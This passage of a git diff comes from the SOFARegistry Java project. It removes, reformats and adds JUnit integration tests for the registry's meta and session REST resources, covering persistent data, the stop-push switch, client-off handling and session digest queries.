a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/PersistentDataResourceTest.java +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.test.resource.meta; - -import com.alipay.sofa.registry.common.model.console.PersistenceData; -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.test.BaseIntegrationTest; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.MediaType; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static org.junit.Assert.assertTrue; - -/** - * @author xuanbei - * @since 2019/1/14 - */ -@RunWith(SpringRunner.class) -public class PersistentDataResourceTest extends BaseIntegrationTest { - @Test - public void testPersistentDataResource() throws Exception { - PersistenceData persistenceData = new PersistenceData(); - persistenceData.setData("PersistentDataResourceTest"); - persistenceData.setVersion(1024L); - persistenceData.setDataId("PersistentDataResourceTest"); - persistenceData.setGroup(DEFAULT_GROUP); - persistenceData.setInstanceId(DEFAULT_INSTANCE_ID); - - Result response = metaChannel.getWebTarget().path("persistentData/put").request() - .post(Entity.entity(persistenceData, MediaType.APPLICATION_JSON), Result.class); - assertTrue(response.isSuccess()); - Thread.sleep(500); - - response = metaChannel.getWebTarget().path("persistentData/remove").request() - .post(Entity.entity(persistenceData, MediaType.APPLICATION_JSON), Result.class); - assertTrue(response.isSuccess()); - } -} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/ProvideDataResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/ProvideDataResourceTest.java new file mode 100644 index 000000000..a79eb9656 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/ProvideDataResourceTest.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.resource.meta; + +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static org.junit.Assert.assertTrue; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.core.model.Result; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.MediaType; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author xuanbei + * @since 2019/1/14 + */ +@RunWith(SpringRunner.class) +public class ProvideDataResourceTest extends BaseIntegrationTest { + + @Test + public void testPersistentDataResource() throws Exception { + PersistenceData persistenceData = new PersistenceData(); + persistenceData.setData("PersistentDataResourceTest"); + persistenceData.setVersion(1024L); + persistenceData.setDataId("PersistentDataResourceTest"); + persistenceData.setGroup(DEFAULT_GROUP); + persistenceData.setInstanceId(DEFAULT_INSTANCE_ID); + + Result response = + getMetaChannel() + .getWebTarget() + .path("persistentData/put") + .request() + .post(Entity.entity(persistenceData, MediaType.APPLICATION_JSON), Result.class); + assertTrue(response.isSuccess()); + Thread.sleep(500); + + response = + getMetaChannel() + .getWebTarget() + .path("persistentData/remove") + .request() + .post(Entity.entity(persistenceData, MediaType.APPLICATION_JSON), Result.class); + assertTrue(response.isSuccess()); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/StopPushDataSwitchTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/StopPushDataSwitchTest.java index 61bff0670..b754b2624 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/StopPushDataSwitchTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/meta/StopPushDataSwitchTest.java @@ -16,31 +16,25 @@ */ package com.alipay.sofa.registry.test.resource.meta; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.*; + import com.alipay.sofa.registry.client.api.model.RegistryType; +import com.alipay.sofa.registry.client.api.model.UserData; import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; -import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.core.model.Result; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.scheduler.task.Constant; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.ReSubscribers; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; import com.alipay.sofa.registry.test.BaseIntegrationTest; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import java.util.concurrent.atomic.AtomicReference; import org.junit.Test; import org.junit.runner.RunWith; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; import org.springframework.test.context.junit4.SpringRunner; -import org.springframework.util.CollectionUtils; - -import java.util.Map; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertEquals; -import static org.junit.Assert.assertNull; -import static org.junit.Assert.assertTrue; /** * @author xuanbei @@ -48,109 +42,76 @@ */ @RunWith(SpringRunner.class) public class StopPushDataSwitchTest extends BaseIntegrationTest { - @Test - public void testStopPushDataSwitch() throws Exception { - // open stop push switch - assertTrue(metaChannel.getWebTarget().path("stopPushDataSwitch/open") - .request(APPLICATION_JSON).get(Result.class).isSuccess()); - BaseIntegrationTest.dataId = null; - - // register Publisher & Subscriber, Subscriber get no data - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test stop publish data switch"; - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - registryClient1.register(subReg); - Thread.sleep(1000L); - assertNull(BaseIntegrationTest.dataId); - - // close stop push switch - assertTrue(metaChannel.getWebTarget().path("stopPushDataSwitch/close") - .request(APPLICATION_JSON).get(Result.class).isSuccess()); - Thread.sleep(1000L); - - // Subscriber get data, test data - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - // unregister Publisher & Subscriber - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } - - /** - * com.alipay.sofa.registry.server.session.scheduler.task.ProvideDataChangeFetchTask#fireReSubscriber has sleep 1 minute, invoke directly to save time. - * @throws Exception - */ - @Test - public void testStopPushDataSwitchByCode() throws Exception { - // open stop push switch - assertTrue(metaChannel.getWebTarget().path("stopPushDataSwitch/open").request(APPLICATION_JSON) - .get(Result.class) - .isSuccess()); - BaseIntegrationTest.dataId = null; - - // register Publisher & Subscriber, Subscriber get no data - String dataId = "test-dataId-hahhahahahha-" + System.currentTimeMillis(); - String value = "test stop publish data switch by code"; - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - registryClient1.register(subReg); - Thread.sleep(1000L); - assertNull(BaseIntegrationTest.dataId); - - // invoke code directly - Interests sessionInterests = sessionApplicationContext.getBean(Interests.class); - TaskListenerManager taskListenerManager = sessionApplicationContext.getBean(TaskListenerManager.class); - SessionServerConfig sessionServerConfig = sessionApplicationContext.getBean(SessionServerConfig.class); - if (sessionInterests instanceof ReSubscribers) { - ReSubscribers reSubscriber = (ReSubscribers) sessionInterests; - - Map> reSubscribers = reSubscriber - .getReSubscribers(); - if (reSubscribers != null && !reSubscribers.isEmpty()) { - reSubscribers.forEach((dataInfoId, subscribers) -> { - if (!CollectionUtils.isEmpty(subscribers)) { - sessionServerConfig.setStopPushSwitch(false); - TaskEvent taskEvent = new TaskEvent(dataInfoId, TaskEvent.TaskType.SUBSCRIBER_MULTI_FETCH_TASK); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers.values()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - }); - reSubscriber.clearReSubscribers(); - } - } - Thread.sleep(1000); - - // Subscriber get data, test data - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - // unregister Publisher & Subscriber, close stop push switch - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - assertTrue(metaChannel.getWebTarget().path("stopPushDataSwitch/close").request(APPLICATION_JSON) - .get(Result.class) - .isSuccess()); - } + + private static final Logger LOGGER = LoggerFactory.getLogger(StopPushDataSwitchTest.class); + + @Test + public void testStopPushDataSwitch() throws Exception { + // open stop push switch + ParaCheckUtil.checkNotNull(metaChannel, "metaChannel"); + assertTrue( + getMetaChannel() + .getWebTarget() + .path("stopPushDataSwitch/open") + .request(APPLICATION_JSON) + .get(Result.class) + .isSuccess()); + Thread.sleep(2000L); + + AtomicReference dataIdResult = new AtomicReference<>(); + AtomicReference userDataResult = new AtomicReference<>(); + + // register Publisher & Subscriber, Subscriber get no data + String dataId = "test-dataId-" + System.currentTimeMillis(); + String value = "test stop publish data switch"; + + LOGGER.info("dataidIn:" + dataId); + + SessionServerConfig sessionServerConfig = + sessionApplicationContext.getBean(SessionServerConfig.class); + + LOGGER.info("sessionServerConfig.isStopPushSwitch:" + sessionServerConfig.isStopPushSwitch()); + waitConditionUntilTimeOut(sessionServerConfig::isStopPushSwitch, 6000); + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + SubscriberRegistration subReg = + new SubscriberRegistration( + dataId, + (dataIdOb, data) -> { + LOGGER.info("sub:" + data); + dataIdResult.set(dataIdOb); + userDataResult.set(data); + }); + subReg.setScopeEnum(ScopeEnum.dataCenter); + registryClient1.register(subReg); + Thread.sleep(3000L); + assertNull(dataIdResult.get()); + + // close stop push switch + assertTrue( + getMetaChannel() + .getWebTarget() + .path("stopPushDataSwitch/close") + .request(APPLICATION_JSON) + .get(Result.class) + .isSuccess()); + + waitConditionUntilTimeOut(() -> dataIdResult.get() != null, 6000); + + // Subscriber get data, test data + assertEquals(dataId, dataIdResult.get()); + assertEquals(LOCAL_REGION, userDataResult.get().getLocalZone()); + assertEquals(1, userDataResult.get().getZoneData().size()); + assertEquals(1, userDataResult.get().getZoneData().values().size()); + assertEquals(true, userDataResult.get().getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, userDataResult.get().getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, userDataResult.get().getZoneData().get(LOCAL_REGION).get(0)); + + // unregister Publisher & Subscriber + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsManagerOpenResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsManagerOpenResourceTest.java new file mode 100644 index 000000000..28af97185 --- /dev/null +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsManagerOpenResourceTest.java @@ -0,0 +1,75 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.test.resource.session; + +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertTrue; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.session.resource.ClientManagerResource; +import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.Arrays; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.springframework.test.context.junit4.SpringRunner; + +/** + * @author xuanbei + * @since 2019/1/14 + */ +@RunWith(SpringRunner.class) +public class ClientsManagerOpenResourceTest extends BaseIntegrationTest { + + @Test + public void testZoneClientOff() throws Exception { + startServerIfNecessary(); + ClientManagerResource clientManagerResource = + (ClientManagerResource) sessionApplicationContext.getBean("clientManagerResource"); + ClientManagerResource mockedResource = spy(clientManagerResource); + when(mockedResource.getOtherServersCurrentZone()) + .thenReturn(Arrays.asList(new URL(LOCAL_ADDRESS, sessionPort))); + + CommonResponse response = + mockedResource.clientOffInZone(sessionChannel.getLocalAddress().getHostString()); + assertTrue(response.isSuccess()); + String dataId = "test-dataId-" + System.currentTimeMillis(); + String value = "test client off"; + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + String countResult = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 1")); + response = mockedResource.clientOffInZone(sessionChannel.getLocalAddress().getHostString()); + assertTrue(response.isSuccess()); + countResult = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 0")); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsOpenResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsOpenResourceTest.java index f456d5b01..0d0bcd16e 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsOpenResourceTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/ClientsOpenResourceTest.java @@ -16,37 +16,45 @@ */ package com.alipay.sofa.registry.test.resource.session; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.test.BaseIntegrationTest; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertTrue; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class ClientsOpenResourceTest extends BaseIntegrationTest { - @Test - public void testClientOff() throws Exception { - clientOff(); - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test client off"; - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(1000L); + @Test + public void testClientOff() throws Exception { + clientOff(); + String dataId = "test-dataId-" + System.currentTimeMillis(); + String value = "test client off"; + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); - String countResult = dataChannel.getWebTarget().path("digest/datum/count") - .request(APPLICATION_JSON).get(String.class); - assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 1")); + String countResult = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 1")); - clientOff(); - countResult = dataChannel.getWebTarget().path("digest/datum/count") - .request(APPLICATION_JSON).get(String.class); - assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 0")); - } + clientOff(); + countResult = + dataChannel + .getWebTarget() + .path("digest/datum/count") + .request(APPLICATION_JSON) + .get(String.class); + assertTrue(countResult.contains("[Publisher] size of publisher in DefaultDataCenter is 0")); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionDigestResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionDigestResourceTest.java index c9107a5dc..bfb92dd18 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionDigestResourceTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionDigestResourceTest.java @@ -16,155 +16,211 @@ */ package com.alipay.sofa.registry.test.resource.session; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.client.api.model.RegistryType; import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; import com.alipay.sofa.registry.common.model.store.DataInfo; import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.ArrayList; +import java.util.List; +import java.util.Map; +import java.util.Set; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.GenericType; +import javax.ws.rs.core.MediaType; import org.junit.AfterClass; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.GenericType; -import javax.ws.rs.core.MediaType; -import java.util.ArrayList; -import java.util.List; -import java.util.Map; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertEquals; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class SessionDigestResourceTest extends BaseIntegrationTest { - @BeforeClass - public static void beforeClass() throws Exception { - clientOff(); - dataId = "test-dataId-" + System.currentTimeMillis(); - value = "SessionDigestResourceTest"; - - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - registryClient1.register(subReg); - Thread.sleep(500L); - } - - @AfterClass - public static void afterClass() { - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } - - @Test - public void testGetSessionDataByDataInfoId() throws Exception { - Map> publisherMap = sessionChannel + private static final String dataId = "test-dataId-" + System.nanoTime(); + private static final String value = "SessionDigestResourceTest"; + private static final MySubscriberDataObserver observer = new MySubscriberDataObserver(); + + @BeforeClass + public static void beforeClass() throws Exception { + clientOff(); + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + registryClient1.register(subReg); + Thread.sleep(3000L); + + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + } + + @AfterClass + public static void afterClass() { + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } + + @Test + public void testGetSessionDataByDataInfoId() throws Exception { + Map> publisherMap = + sessionChannel .getWebTarget() .path("digest/pub/data/query") - .queryParam("dataInfoId", - DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) - .request(APPLICATION_JSON).get(new GenericType>>() { - }); - assertEquals(1, publisherMap.size()); - assertEquals(1, publisherMap.get("PUB").size()); - assertEquals(dataId, publisherMap.get("PUB").get(0).getDataId()); - assertEquals(value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0) - .getBytes())); - - Map> subscriberMap = sessionChannel + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(1, publisherMap.size()); + assertEquals(1, publisherMap.get("PUB").size()); + assertEquals(dataId, publisherMap.get("PUB").get(0).getDataId()); + assertEquals( + value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0).getBytes())); + + Map> subscriberMap = + sessionChannel .getWebTarget() .path("digest/sub/data/query") - .queryParam("dataInfoId", - DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) - .request(APPLICATION_JSON).get(new GenericType>>() { - }); - assertEquals(1, subscriberMap.size()); - assertEquals(1, subscriberMap.get("SUB").size()); - assertEquals(dataId, subscriberMap.get("SUB").get(0).getDataId()); - - Map map = sessionChannel + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(new GenericType>>() {}); + assertEquals(1, subscriberMap.size()); + assertEquals(1, subscriberMap.get("SUB").size()); + assertEquals(dataId, subscriberMap.get("SUB").get(0).getDataId()); + + Map map = + sessionChannel .getWebTarget() .path("digest/all/data/query") - .queryParam("dataInfoId", - DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) - .request(APPLICATION_JSON).get(Map.class); - assertEquals(2, map.size()); - assertEquals(1, ((List) map.get("SUB")).size()); - assertEquals(1, ((List) map.get("PUB")).size()); - assertEquals(dataId, ((Map) ((List) map.get("SUB")).get(0)).get("dataId")); - assertEquals(dataId, ((Map) ((List) map.get("PUB")).get(0)).get("dataId")); - assertEquals(value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0) - .getBytes())); - } - - @Test - public void testetSessionDataByConnectId() throws Exception { - List connectIds = new ArrayList<>(); - connectIds.add(NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1))); - Map> publisherMap = sessionChannel + .queryParam( + "dataInfoId", DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)) + .request(APPLICATION_JSON) + .get(Map.class); + assertEquals(2, map.size()); + assertEquals(1, ((List) map.get("SUB")).size()); + assertEquals(1, ((List) map.get("PUB")).size()); + assertEquals(dataId, ((Map) ((List) map.get("SUB")).get(0)).get("dataId")); + assertEquals(dataId, ((Map) ((List) map.get("PUB")).get(0)).get("dataId")); + assertEquals( + value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0).getBytes())); + } + + @Test + public void testetSessionDataByConnectId() throws Exception { + List connectIds = new ArrayList<>(); + connectIds.add( + NetUtil.genHost(LOCAL_ADDRESS, getSourcePort(registryClient1)) + + ValueConstants.CONNECT_ID_SPLIT + + NetUtil.genHost(LOCAL_ADDRESS, 9600)); + Map> publisherMap = + sessionChannel .getWebTarget() .path("digest/pub/connect/query") .request(APPLICATION_JSON) - .post(Entity.entity(connectIds, MediaType.APPLICATION_JSON), - new GenericType>>() { - }); - assertEquals(1, publisherMap.size()); - assertEquals(1, publisherMap.get("PUB").size()); - assertEquals(dataId, publisherMap.get("PUB").get(0).getDataId()); - assertEquals(value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0) - .getBytes())); - - Map> subscriberMap = sessionChannel + .post( + Entity.entity(connectIds, MediaType.APPLICATION_JSON), + new GenericType>>() {}); + assertEquals(1, publisherMap.size()); + assertEquals(1, publisherMap.get("PUB").size()); + assertEquals(dataId, publisherMap.get("PUB").get(0).getDataId()); + assertEquals( + value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0).getBytes())); + + Map> subscriberMap = + sessionChannel .getWebTarget() .path("digest/sub/connect/query") .request(APPLICATION_JSON) - .post(Entity.entity(connectIds, MediaType.APPLICATION_JSON), - new GenericType>>() { - }); - assertEquals(1, subscriberMap.size()); - assertEquals(1, subscriberMap.get("SUB").size()); - assertEquals(dataId, subscriberMap.get("SUB").get(0).getDataId()); - - Map map = sessionChannel.getWebTarget().path("digest/all/connect/query") + .post( + Entity.entity(connectIds, MediaType.APPLICATION_JSON), + new GenericType>>() {}); + assertEquals(1, subscriberMap.size()); + assertEquals(1, subscriberMap.get("SUB").size()); + assertEquals(dataId, subscriberMap.get("SUB").get(0).getDataId()); + + Map map = + sessionChannel + .getWebTarget() + .path("digest/all/connect/query") .request(APPLICATION_JSON) .post(Entity.entity(connectIds, MediaType.APPLICATION_JSON), Map.class); - assertEquals(2, map.size()); - assertEquals(1, ((List) map.get("SUB")).size()); - assertEquals(1, ((List) map.get("PUB")).size()); - assertEquals(dataId, ((Map) ((List) map.get("SUB")).get(0)).get("dataId")); - assertEquals(dataId, ((Map) ((List) map.get("PUB")).get(0)).get("dataId")); - assertEquals(value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0) - .getBytes())); - } - - @Test - public void testGetSessionDataCount() { - String result = sessionChannel.getWebTarget().path("digest/data/count") - .request(APPLICATION_JSON).get(String.class); - assertEquals("Subscriber count: 1, Publisher count: 1, Watcher count: 0", result); - } - - @Test - public void testGetPushSwitch() { - Map result = sessionChannel.getWebTarget().path("digest/pushSwitch") - .request(APPLICATION_JSON).get(Map.class); - assertEquals(1, result.size()); - assertEquals("open", result.get("pushSwitch")); - } + assertEquals(2, map.size()); + assertEquals(1, ((List) map.get("SUB")).size()); + assertEquals(1, ((List) map.get("PUB")).size()); + assertEquals(dataId, ((Map) ((List) map.get("SUB")).get(0)).get("dataId")); + assertEquals(dataId, ((Map) ((List) map.get("PUB")).get(0)).get("dataId")); + assertEquals( + value, bytes2Object(publisherMap.get("PUB").get(0).getDataList().get(0).getBytes())); + } + + @Test + public void testGetSessionDataCount() { + String result = + sessionChannel + .getWebTarget() + .path("digest/data/count") + .request(APPLICATION_JSON) + .get(String.class); + assertEquals("Subscriber count: 1, Publisher count: 1, Watcher count: 0", result); + } + + @Test + public void testGetPushSwitch() { + Map result = + sessionChannel + .getWebTarget() + .path("digest/pushSwitch") + .request(APPLICATION_JSON) + .get(Map.class); + assertEquals(1, result.size()); + assertEquals("open", result.get("pushSwitch")); + } + + @Test + public void testGetDataInfoIdList() { + Set result = + sessionChannel + .getWebTarget() + .path("digest/getDataInfoIdList") + .request(APPLICATION_JSON) + .get(Set.class); + + assertTrue( + result.toString(), + result.contains(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP))); + } + + @Test + public void testCheckSumDataInfoIdList() { + int result = + sessionChannel + .getWebTarget() + .path("digest/checkSumDataInfoIdList") + .request(APPLICATION_JSON) + .get(int.class); + assertTrue(String.valueOf(result), result != 0); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionOpenResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionOpenResourceTest.java index dced23b2e..b217fc9cb 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionOpenResourceTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/session/SessionOpenResourceTest.java @@ -16,44 +16,51 @@ */ package 